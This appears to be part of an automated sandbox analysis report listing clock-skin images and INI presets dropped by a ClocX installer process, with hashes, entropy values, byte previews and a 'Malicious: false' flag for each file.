Preview:	BM........6...(...w...x.....................................................................................................................................................................................\|\|\|vvvrrrnnnkkkeee`___^^_^^_^^_^^_^^_^^dcckkknnnqqquuuzzz................................................................................................................................................................................................................................................................................................}}}tttlll]\\PNMHA>>4/=0(?+ B,.G+.J+.J,.Q..]5.S1.L+.L,.N,.F-.C..@1'A5.I?;OLI][Zkkkrrrzzz........................................................................................................................................................................................................................................................................wwwlllWUTHA>=1*;).J,.[2.i;.}D".M).W,.]1.g5.h5.h6.k7.p:.l8.i7.j6.j7.d4.]0.T,.N(xE"j;.X1.J/.B2(EA9TPOj

C:\Program Files (x86)\ClocX\Presets\Nvidia.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51325
Entropy (8bit):	7.970726173309494
Encrypted:	false
SSDEEP:	1536:1UgYGQi4Wwa/oNQNl7rZm18uE9UgRt3Nx:IagNql7rZi8ueUgRt3Nx
MD5:	76A66CC455FE13CC78642306B6B0FFC5
SHA1:	EC2239DC12A29F2E779CF8E7D5C7D0D11E72F050
SHA-256:	CB30C8527BD4938FB783E767294C729DA016FE0FEA5FF77537648A7C93EA6F07
SHA-512:	7BECF5AA337146328464BEB4BB929430783D22721C2CCEC33484C8F7F6F7185C4712CFC00C56DC6779288C0B6FD7B1B3AD7298328C9875455B6FE214CC931769
Malicious:	false
Preview:	.PNG........IHDR.............=..2....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(........h.......h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a....f..m.Q.>..4...b'!5........ ......V..T#).4..6.B..e.}..]...7Mww..l.y..qDY.`.C.&0fB.tT....B.i...,;C..h..u.!$C4....R..N....B.....0`.Ft].$..6:O3.0&..n>......T.C.Eak...eE..x...}.4M.w.>b...~.O.uD..u]/}._.`.^.0....ft+c.......c.1q._...W......sA........y..k!yU..q......c.9...S........YD...B..4P...W.4..x..G.X,.............4P...e.n.Q.?.\.HC!....t..lA..f....s{Y..n...l.G...}...q.~3.[....iL.. `B..L".L.....de...&&!`b......e, ..f.f&`n..........A..@f!......@....o`B.......0.......F...>}.\|......0..Tw........4..h,a...4......?.A.....Q..................T.JYVV.p.....?..j!P..?....%V.Z......A%-(S00.B.........._...T.....{...?....u...o.....P....~..t/a5.(``.. .....%%30q.rrq.qqr).......!...!0.......B...(...:....._(.....1..vM.....j ..n/P..#D............l.j..,/.l..............C......

C:\Program Files (x86)\ClocX\Presets\Nvidia2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	38663
Entropy (8bit):	7.939352265060175
Encrypted:	false
SSDEEP:	768:YIygzjK57ldtn9T5V8/P6aUDIe2YpbZIflcVnhyEKUfa6:YIyl5719TQ/SEYpCchyRUfa6
MD5:	3F7A7F9AC3ACB81A6EF1566C8ABDEA93
SHA1:	63A3AA6DC8709BEE66BC947CA44246457D18A146
SHA-256:	C2A189D25B3591E3F12E2DA6D4D7D05B2C04588A15A0803FE1E66EB7BC460956
SHA-512:	912AC4B7D0EB25B9058A5D3D3360D0C5AB967D28417ED6E7651C979B1410229470CFAE2CA35F47F85DDD9791E9860902D3DD5C7287D3C45B08A43FCAF91BEDE0
Malicious:	false
Preview:	.PNG........IHDR.............=..2....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F...}IDATx.b...?.(........h.......h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...h4A..a...pj-...1.,..W R."U........_h.......cG... k.....[......./C)y.....kj...-5MC...84.3.}/8.5..g.M.....;.s9..Q..0`?Q.d........\...{T.%.8_.T.h..<.........]...x..("c?.N.s.,.h.&...1.p.....1..w..a..3..8?Zk..qY..)M...H+G.8.0...+.z_....5k.....4}........f..UQ..u`-Y...u).c..w]-......t.......t.Pu.`....\|...u..S..2.^........1w}....y6R...Om..../..=...M.H......jq&..v......A.. .EM\t....h..;@ko D.P..7..P.0..8..t..MmL....&.?b......f...O.6.R.H..K{.a.:.I\.P....7.SE..s:c.Rm.f.}....7r.>..Z./..[......K.......L.... ...7^VV....?......%.../.T..i@...A%..$............./. ./B...d........4.Xr.!H.........,.8...`.%...........i~......\|.*..T..../...C..?..............-.+.a ...H...5X.e.%x....!...&..N.-.>2...m.wu?D.RN'N.,....!.k..G8b..[.....".s._...

C:\Program Files (x86)\ClocX\Presets\ORIGINAL.INI

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	947
Entropy (8bit):	4.654346901304024
Encrypted:	false
SSDEEP:	24:BE8rm5b9VTORXFBP1rfjkpWCGm8Oi5Zri:BT0AFNuMCGmIZO
MD5:	3FF821F0959312F31CD380D311B2E690
SHA1:	A0153085828FF32D7020D35330E37336191F5C69
SHA-256:	54EFA1317F80DAE7326E9FFF03D5AA7BEEFED3B1F10EB5CC2E2349EF3E362BAA
SHA-512:	CDE3BD6F5C22EE5ACE89083F9586F0DFE0371137EEE884CD7D92E600FCE652F7A80AF306A56D28E273C42619F172525C9FF17A9C9C897B2E3CA97E18A060EF39
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0x000000 ;cut window by this color (default red)..DisableAMPM=0 ;show AM/PM indicator (default 0)..AMPMColor=0x787878.;color of AM/PM indicator....HourColor=0x00595959 ;color of hour hand..HourLength=33 ;length of hour hand..HourLap=5 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0x00000000 ;color of minute hand..MinuteLength=51 ;length of minute hand..MinuteLap=5 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0x00553FFF ;color of second hand..SecondLength=54 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;width of second hand....CenterX=63 ;center point's X (default image_width / 2)..CenterY=62 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Octopye2.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1497
Entropy (8bit):	4.856187163129489
Encrypted:	false
SSDEEP:	24:BEGrGXz5lrANhjaKhVuTOLX01rfPkp+dGm8JiX1PgibQ0Wd9iBxLuQI:B1qFlWhjfiiEdGmx1PXQJTiBxLvI
MD5:	85653ABA4507AB8F7AA3B19C5B04694B
SHA1:	EA5411F08D9E1E2242D8527E0A18A2DC9C1A5327
SHA-256:	698A1A399E48FD084FE2453458CEA1F87FE6A66CACC18BAE34C5C2AA4DFB60E0
SHA-512:	63D05A6540E7186562B9BAFCE9FA572456DD9B37EE2F8E2040F7377A35AA64EFBD95F97761D8AA39D4AE6CDC46AA73DBF222C20BDB3E8DCF3719EE276C2E3EC3
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number)..[Settings]..CutColor=0xFFFFF0 ;cut window by this color (default red).....;not used with PNG in Win2k/XP....DisableAMPM=0 ;force AM/PM indicator disabled (default 0)..AMPMColor=0x000000.;color of AM/PM indicator..AMPMFont=Arial..AMPMFontSize=12 ;size of AM/PM font..AMPMCenterY=128....DisableDate=0..DateColor=0x000000..DateFont=Arial..DateFontSize=12..DateCenterY=45....HourColor=0xFFFFFF ;color of hour hand..HourLength=39 ;length of hour hand..HourLap=0 ;overlap of hour hand..HourWidth=3 ;width of hour hand....MinuteColor=0xFFFFFF ;color of minute hand..MinuteLength=59 ;length of minute hand..MinuteLap=0 ;overlap of minute hand..MinuteWidth=2 ;width of minute hand....SecondColor=0xFFFFFF ;color of second hand..SecondLength=63 ;length of second hand..SecondLap=0 ;overlap of second hand..SecondWidth=1 ;wid

C:\Program Files (x86)\ClocX\Presets\Octopye2.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24962
Entropy (8bit):	7.967086316786837
Encrypted:	false
SSDEEP:	384:PXE05mYZsf551uyWvNZ+ZM696UTYvUiRqYud3OKaLBlkBnsUA0Z6jX/wB:f35ZZk9uDvNEKdUTYvUmMiUMjYB
MD5:	E6B20AA4B1D6B2A0C678D9194D042BE9
SHA1:	106CEBA43CD660D22367D54D40F82D000FDFC706
SHA-256:	B653C83CCB4B6026BC10FCC2E110BB7C37869B95722187D576D6710810F4CA88
SHA-512:	6188A3DF83CD935F62F424793D483CF27F7F135E7BECB54F1412C6D18985A437370AB5F1FFE21B3B53B5BD9486944014155B72EAB0B9AF01709DC4C4869F2C2F
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r....OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+.....x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D...A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

C:\Program Files (x86)\ClocX\Presets\Omega.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	921
Entropy (8bit):	4.541130302091602
Encrypted:	false
SSDEEP:	24:BEurZuC/Tzer1SfPkLKpSLgGLTIZKgNi0uGUnn:B9kb+SkG/pAUn
MD5:	039055D6E6EC2F827F2144D2690BA58E
SHA1:	F8AEC1F29548CD3C825AEF43BFC6FFF9BE8B91E7
SHA-256:	F375DFE125D10A47F758F7DCC26A0E0B69798516E8872A0127DB465EA2F30F84
SHA-512:	1C8B3A5A6875E64DF6355203640F5D6FDC9DFC9AB91BEFFB17DAAF6B4CABEB48A23AC5A7E29883AA9F8DB0FDC42CD3EB0BEE17003A71798391ABB665BA451ECB
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red).ShowAMPM=1 ;show AM/PM indicator (default 0).AMPMColor=0x00000000.;color of AM/PM indicator..HourColor=0xFFFFFF ;color of hour hand.HourLength=30 ;length of hour hand.HourLap=0 ;overlap of hour hand.HourWidth=3 ;width of hour hand..MinuteColor=0xFFFFFF ;color of minute hand.MinuteLength=48 ;length of minute hand.MinuteLap=0 ;overlap of minute hand.MinuteWidth=2 ;width of minute hand..SecondColor=0xFFFFFF ;color of second hand.SecondLength=50 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=1 ;width of second hand..CenterX=85 ;center point's X (default image_width / 2).CenterY=95 ;center point's Y (default image_height / 2)..

C:\Program Files (x86)\ClocX\Presets\Omega.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 170 x 191, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	68718
Entropy (8bit):	7.985388047540227
Encrypted:	false
SSDEEP:	1536:pJAQ0eiN162qhdH6wOnlskiRG5xFQlYbQFvUbxARNq:pJR0eiNnjlnlsjRMxFQkgdNq
MD5:	90B33F49BA0866F011D67E640CCA98B0
SHA1:	35DFDA4F68CBEB266587D307343FA4BF2EA7DC96
SHA-256:	6C422277C9BC23912CA6AEF5A32F141FF1A7AD06711C52005FD8BEAE7C0655E3
SHA-512:	AA900BF4A830203857BE1F059F547BCCA69992F822405B3719987B3DD499429DCDC178B5949B2FBB979E519407304C94F03BAA5672F0C4F6016DE8E84B0ACFA0
Malicious:	false
Preview:	.PNG........IHDR.............nmG.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......

C:\Program Files (x86)\ClocX\Presets\Original.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	18873
Entropy (8bit):	7.982586670751772
Encrypted:	false
SSDEEP:	384:f6sWIpV7vdV85P6H1LNCaP3TzMVAr/bR5fy/GPr5Kzd99qjEHwyxZ6rlgSS1Gh+n:nWyV7L2P6Vx3TzMVAr/NBy+z5Kh7wEHb
MD5:	E22608FECBA37804ABADE6A53491D5F5
SHA1:	DC6332D7E549A5D0E784125DCED56B029EF0F902
SHA-256:	8633DD0386ACB524E19DECB2546525086C13723EEACA26DAF16A91507A142C97
SHA-512:	540DCC88962AAAAC5010985FD875424E6D73ED4DD167EA039FFA8A37FFA392AA709A6E459113A52C41E9669AA06325ADC117A22FD32163FF7E36B8D21D132CCE
Malicious:	false
Preview:	.PNG........IHDR..............>a.....gAMA....B.O.....pHYs................$tEXtSoftware.QuickTime 6.0.1 (Mac OS X).x.FA....tIME.....1.Y8.... .IDATx..Z.tTU..j_S..J*..^.......EA...8.m..G.....OO.m.g<.8m..v. ...i..@..H.$..!{.JjM-o.J%..,..g.?...{.............?m..z.7..>G..qf.&.&.m..........N....>.EZ...p.G.....8..Ql6.#...,.\FQN...._.............l.ko.;..qS.E.........H\|^"........5)~l...8.......I.D..\|.6A.......W(......TI.`.T~........B.....f..,.....a3.l...#.&....~..hwS].@k.....v..q..h$..$..1!~,...9.8...x~.........X.tZ54a....\|x.1.xF..0..`.6.h...b.iw.E..d1.6.......9...!..lr.N...8..5...A.^........U.:N..M....[.!.W%h..d.....k.t6i...R.&.....is.eq.Z.$.B..v.......hij..n.vu.j.........B.....&.q....k.;..'..!.V'(..\.... .B....EX.....".@D.-..q...'..Z.>.Y5p....i`/....oh2.....f#......!.s.H..N?o....IiQ.'i..@o/.p...kN........1.. ..Q....A./.L&.R.....O....{&... .....b..\|....1....o`.#.qt.``....l..Jm$.......H.....#h<....'.^...Q..r......01.0.....6.D....U..M.CZv,dr..;.....~Y...f

C:\Program Files (x86)\ClocX\Presets\Uhr.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	4.759908504120321
Encrypted:	false
SSDEEP:	24:BEur7X5lruueRJoR1gTzIU1sRDkLKWoL/GL4wIdKgQi0VAP10mViWd9iiOMEKG:B97JleJoEFYjGteVPGCTiiOR
MD5:	4D1C32BDBCFE4874AE33DEDBBC870574
SHA1:	A84ADDA368CE3649402EF9AFDE820CB28C549016
SHA-256:	CDA8F9357983BB8070A26E8F8E4163BE6EE41EE516F670A6F60FCD593EFB3A6A
SHA-512:	C4A26C2719803FF73F36D105FE9F25E48041813664D70C21F51515FD45CF7CB826279C39B1B1BA55BCB77E2459FA4975B8BAA65309DA86351138658B0CDD4D30
Malicious:	false
Preview:	;all colors are in BGR format (hexadecimal or number).[Settings].CutColor=0x0000FF ;cut window by this color (default red)....;not used with PNG in Win2k/XP..DisableAMPM=0 ;force AM/PM indicator disabled (default 0).AMPMColor=0x0000FF.;color of AM/PM indicator.AMPMFont=Arial.AMPMFontSize=24 ;size of AM/PM font..DisableDate=0.DateColor=0x0000FF.DateFont=Arial.DateFontSize=24..HourColor=0x000000 ;color of hour hand.HourLength=50 ;length of hour hand.HourLap=9 ;overlap of hour hand.HourWidth=5 ;width of hour hand..MinuteColor=0x000000 ;color of minute hand.MinuteLength=70 ;length of minute hand.MinuteLap=9 ;overlap of minute hand.MinuteWidth=4 ;width of minute hand..SecondColor=0x000000 ;color of second hand.SecondLength=0 ;length of second hand.SecondLap=0 ;overlap of second hand.SecondWidth=0 ;width of second hand.. ;CenterX=60 ;center point's X

C:\Program Files (x86)\ClocX\Presets\Uhr.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 200, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2371
Entropy (8bit):	7.867510860779406
Encrypted:	false
SSDEEP:	48:u3LCLjFmREUcOLr9MoQw5QGojHtHLCZdp37ri1luua27zP8V75m9qz:ufjL5MoQfGkNH2Zdp3i1lujGg
MD5:	3D8E36965E80F589E391048B6E451828
SHA1:	24ADCDAAB515189F8B7E354A414FC9A96458E609
SHA-256:	28E430D0655EC2F1372272AB4DE2A7BCE4D3D068A6C4ED3C1D4FA38C7C5EB9F2
SHA-512:	DCDD3F5F5813C0BFDC7EA1356E68CFA6490D4D57B4D8D58B8B49DA00267ADE78C8CEB4A588E79CFEEA510D5C4E4411631CBD6AD6AED9A3D06AED0EF2E6517D0B
Malicious:	false
Preview:	.PNG........IHDR...............^....tEXtCreation Time.Di 9 Mrz 2004 11:03:25 +0100L.);....tIME....../........pHYs..........iTS....gAMA......a.....PLTE..................................................................................................................................................................................................tRNS.@..f....IDATx..V.8...%E!.....P(!....-....C-I.G.d.3c....$..u.-V...MG.....Z.S{s.g.\|......O.6.Z_A.!..)...~Q..... ..ej...Q.....Q..i...w.Q.8.....[..".8. 5J.. ...52... ....`.x.G...8 B./\|\|9/j.. ZN...W...Y.J.1G....,.....h Bt.....M..f..j..X>V....f2_N.u...hT-.7p@..(......k.....Z....`%..^..x..!.2.D.q.<...U....O.9..[T.R.us.P....2.El..4W....wL.f{A..HnU..8.].......H.U..8.A..!..I....#5..eG......x...K..b.xS8.&...z..8Gx.5.m...*..XN3...q\.\...QF.,.r.u...]$e@.#W.L...=G.A...$.....)ZY..?Vh......U../.!......L)@....]_.>............r'~..Rz.(..%..G<...>].9...b..p!....9^aF. ..........\8...#..V..d.&.$.D...c...b..bF..9/.

C:\Program Files (x86)\ClocX\Presets\UniversalAccess.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	28087
Entropy (8bit):	7.896392022586553
Encrypted:	false
SSDEEP:	768:OEJ3pClk2uBpQvaJU13kpxmAKL53BT//5UfMOYAIy:OEJ3ckjBpzmAmJD4Nb
MD5:	506F6336897626BD9835E476684E6ADD
SHA1:	3C61FE92E21ACA5079397899D3F28E8658EE92C5
SHA-256:	099E2D25A3BCBBA998B4CED1D927C975267F129BCA18865C41DBBC111428B6A7
SHA-512:	D1C33B485D2809A754F7D90B8C6C123D68300F590CE526DDA5E53062B076D9EC1FC718924B66E81E810D8ABCA4B596513665068B916CEC4487B0318386D0FA29
Malicious:	false
Preview:	.PNG........IHDR..............>a.....pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..m-IDATx.b...?.(... ..F.`d....M.#....h.... .F......4..F8..@z..4....Mj.......W.i..........Z.}.q....x.BH...dv!....w..g.....\F3...a...V...d.R/BXQ..J[...Z..0..!.$...+....n..2.2.....4v..c...e.U0..z..J.79..........O..u..{....Q..."]....J...i..fdU[..........b_...x,.3......cn...\......~.>....Q... ..h!......~.....M!....8..?.Xr.]3;......tL.Uj]...G..mU.:.. ..Y. C["...BU...$........!(d.G</...0Odfy.b#..)........x.X...R......n,l,:.l."L,,...............E<...R.......&.R....M.@.,b.9..H+...._.]..s...>..7.9y.P.a..g@]....P.L...2..........l.......b..........,f......:.G0.R....H..........J F0....D/...)...........g.L.........u`....P.....@=w ......4....h...L.L..I...N...L.,..l.....(........"....I...Q...rH...5.(U0..K..`...(.....7+.........~..y....K..@K..S. .t.. .A....".....Y8..Y....9X....nX11".VFp+.................?Fx.......Wa.......>....2".....m...6...U..;.A......n...O.`bp..

C:\Program Files (x86)\ClocX\Presets\UniversalAccessClock.bmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PC bitmap, Windows 3.x format, 117 x 119 x 24, resolution 2834 x 2834 px/m, cbSize 41944, bits offset 54
Category:	dropped
Size (bytes):	41944
Entropy (8bit):	6.884203334546955
Encrypted:	false
SSDEEP:	768:7qhT45p/v7mUzQgC3oi76ieOCycgyC20TgDsu+Xy9Ct3PaxFf6Hc:m1o/v7mSQgC3l6ieOCycgyD0TgDQWFS8
MD5:	BC84D78607167F8C38B8B4CF7C33A54A
SHA1:	11D9589ACCBD208A0385EBA8104B4045727A7B1A
SHA-256:	29B49A701AC81741ABF8E42F569AC57FF587E91C55D4E361E97D49EE3E5AFA43
SHA-512:	10320B32859CF9FE3129C9C7C72066F877835A3952E2ED18F30B4766193DE4AE0F1347884CDA598220198EEB6BFF11592BCAABFCCF5F97989A5A48805C1D0C53
Malicious:	false
Preview:	BM.......6...(...u...w................................................................................................................................................................~~~{{{wwwtttttttttsssrrrsssrrrqqqqqqqqqqqqpppppppppqqqqqqqqqrrrrrrsssrrrttttttttttttwww{{{~~~.......................................................................................................................................................................................................................................................}}}yyytttpppqqqqqqppppppppplllhgghcciaah]]gXXgTSeNMeKJeEEeDDeEEfKJeMLfRQiYYi]]i``jddiggkkkooopppqqqqqqqqqqqqtttyyy}}}..........................................................................................................................................................................................................................................................~~~yttthgmSRlB@n86q/+v)$y$.~................................{#.x($s/+n52m@=lNLsdcysr}{{.......................

C:\Program Files (x86)\ClocX\Presets\Unreal.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 200 x 150, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	47143
Entropy (8bit):	7.975093314101227
Encrypted:	false
SSDEEP:	768:iEIQli4ubch7Y6jAj+lFOf68cc3NWQReu8jmJaa4/ImyJi7RGF9kepuOOdY74G:mX4Ge7JE7f6/ONWQp8jmJa9/IfJmEclw
MD5:	D483FFB9842A8F0A99F70376253FD45F
SHA1:	351350ABC3974B4ED94CB8ADC11EF057BE9F71D1
SHA-256:	6CEE1DFDA69C5D1D301919AFE55B02954DBA639AE118EBC446E32F41359BA005
SHA-512:	0777E6817E8E1AE1A68098E6F32550227A815739CB44970F64A6976ADB583E1FD30720D5F14D53DFF6C607347C4B72CDE8604F934B887AC0891D3FD6624354E3
Malicious:	false
Preview:	.PNG........IHDR.....................pHYs.................gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F....IDATx.b...?.(....;.. .. ....7...\..D...W.{4.Y.W^`..Wp.../..=.t...9.n..(..W...V........A..D.j..u....`.b..1/.N!M..@_.y.L....e..o.]z.v...9........Z.....)F..=.#.Zvq.*zl.>n.>...q........'w.)..5/.j....z..)....<CUP.c.B..3W......H)v.{nF.F.....~5.9.).-..^..%.z;.R...'\|.....q..w..!.....7v.... ?..e....`...2@......._.?....??t........o.>}..././FF.P.... ..._0..8A...0s.....I...../.;.......Zp..~.#H.....P.-.....Bq.`.bfb....d`1.....``.....o^FP.......b`.f..}F..P..,.Y.X!...A5.....aP)...i........`....&.xf..o.,,...........%..O......u.@..f..3.8cH.."?........_..............k.P..e..feeg...f..{...j.&`...Rc0...d.6.......&...y@6.....o.Z`..........O..."..Y.~.0f..XWX..@k..@.i4.(..../...a...uPI.2K..f]...st.L.........1...a..w...N...}FT.7...qE...............Pd...$.d.p\N...P...I..l..\ .......X.......GY..I+N..e.W.:..........@.[.o...c-7..0...~..#gV`..`56`..`......ixn%....)

C:\Program Files (x86)\ClocX\Presets\Verde.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24372
Entropy (8bit):	7.8992689181996605
Encrypted:	false
SSDEEP:	384:wKtpFYgTIAbgpMWf7/uBGdxNE8OWzMQs8gwYG0F8LsI2u4QV14dAlsoRp4OhX9VX:7n3z2jYw4WzPs8gX7COFOl3
MD5:	6695A6E6D1A860BEF4E6B14DD3A40B22
SHA1:	184D69E9C87FB39AB70A03E7834A416465F7C46D
SHA-256:	F4FAD2F41ABB996D7F8F149082EE0AC56E9960748FBB587E50A93432504790B0
SHA-512:	6F5717A39741A7C36AAFFA6996C1C795EA120E0E1C8B0612EE61B929AC00710DD4C6D33869BCF86568E26AAAF94742FE867A7EB334EED8A07E0712375284638C
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..^.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4.H.......@,... ....X..E.X.......9.....7....@......k ~.....3<....>........&......z`..V..H..L. ..b. V...w...._..+..}.../...v..@...5.j.....i..@l..#.P......=......w...........O.LQ...j..v@l.....#.]..... >.....e.O..............p.bg ..L...^F....+...{.x7.........%...a .^.j.,._q......;.\.X..(8.0.....d.b.j..&q..z......W`.....q,B..Zc.V....B.FP.D..3.....O..j..+...SZdE..}.f4..F..q.)ta...v.G...g.D$$r2.....O..D.j....?.3.I.HB.D.... '".(&. ',.dK0(.H..-.0.2C.)....#.%2(....$....J.....g...../.......$f...3AC..P....?......a....W.H..q.0a:.'Z....L}.LL.RSFH.ACZ.ACR.ACJ..`9.9..@...i.d.L..u.(A......g.7........ex..9.......w......H.......f8.3@.....L..1.H ....g..hAM.P.. ./../....L."\|.(...F...B<\|....B......B...)..

C:\Program Files (x86)\ClocX\Presets\Violeta.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PNG image data, 176 x 176, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	24933
Entropy (8bit):	7.90650308950336
Encrypted:	false
SSDEEP:	768:NLPppFgWbMSDrW/a/e/mbWfMpB3MXKlKQ:NDLASDr+myiVMLQ
MD5:	03B13207E96453A1724E2C86844D6F03
SHA1:	60EBE3929D936A6DF44E80AE9DB5E061CA41D555
SHA-256:	73DAFE6E6FE8C0CA6F689A899CD704AE26B7D35F494A7FDCAB895C774AFAF17B
SHA-512:	809910F6371D592821CA10F186CBC91F6F3855B36A03EFFEAB15F721F292AFC86674C2597741839C0AB704D6FC96049520463D4C0B90F3B8EF24C9D91C2E39DE
Malicious:	false
Preview:	.PNG........IHDR................^....pHYs..u0..u0..3r.....gAMA....\|.Q.... cHRM..z%..............u0...`..:....o._.F..`.IDATx.b...?.(..C.....h.......h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!...h4...!....e4....R~.....@,..2@,..b@,..@.......9.....7..g`...H....@..._..3 ~....>..=.l...&......z`..V.H.....k.....V..D2....w.27..5 .......hl`...4..Q..&..&I3 m..F.0b. ..GP..4.y.H..&......4..00...+.=.i..6..@ ..U.\R..e?..#@\|..;.L.Fr....L..D.l.0...........J...&aFr.'.eX...E....@....\|c..%@.r...A ..#.qE.X1ZXy..`(<..........'.\|........%....J..j.[.V.....t..:...q0. ...B.PPQ.`&.....]...p.........~.[.....U.....YZ .d......!...._..ls.L..}2.O..h.'``..5........&XF...J.l.l...".Rr...@Z\Z.ARV..O......@.....D..P........D.....././..bx....go..<x..f...'41.GM....F o#.^.L...s....M...+..B..*.H;.K...L.L.L.R..ALR.AAU.A^E..A............J\|..3FF..@..........S..w.0......7........%.}@.. .......x...a........"....H...M..h.....8%e..T...T....Td

C:\Program Files (x86)\ClocX\Presets\VioletteKugler.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	4.906092571887757
Encrypted:	false
SSDEEP:	24:BE0rGXE5lr9BP5MoaKLuaPTO2u1DHkp8wdGj8xi85sjibtYQTd9iBY2jabOtWuc:BTqylRMofiiNdGjWCUtjTTiBY2Gb+Tc
MD5:	6299257E666FF7E94C35E5C06CF2C369
SHA1:	283C54F59495A84734889776ED6F47ED5AB6A98E
SHA-256:	DBE467C95B421C4E0B99BF65A99FEDA9DD8C86687FF10889D3C1DFA6DBEF3E3B
SHA-512:	942802E9022565303ED072DDE09CDC564870DF7FADCEA4156DF47ABA9F38D99E5E73972BEC64CFC68427B492862BBB5CADE78F41D80274DFAC0C684AFE708113
Malicious:	false
